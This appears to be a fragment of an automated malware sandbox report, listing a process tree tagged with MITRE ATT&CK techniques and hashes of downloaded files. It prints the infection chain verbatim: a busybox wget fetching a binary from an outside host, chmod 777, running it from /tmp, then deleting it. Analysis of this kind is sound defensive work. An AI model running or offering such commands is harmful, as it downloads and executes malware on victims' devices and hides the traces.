/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- System Network Configuration Discovery
PID:1010
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1013
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
555B
MD5
c3da85a3173a4ec9d42682016f6a69e2
SHA1
b644cacfbf06e841788ab8deb5e388ef7ddf982d
SHA256
77df749f6bbe85442500437f7e798f46b9635da344811ae3b4bf7d43048ee9bb
SHA512
ff3c45bb810169a269b1d0edcfc251c2b31e4acaec0acf1f8a561752b261fcba76ad0f5f5b298f64c50afa7ac9b99262b25af161451e83b14b202c8d33f2eaeb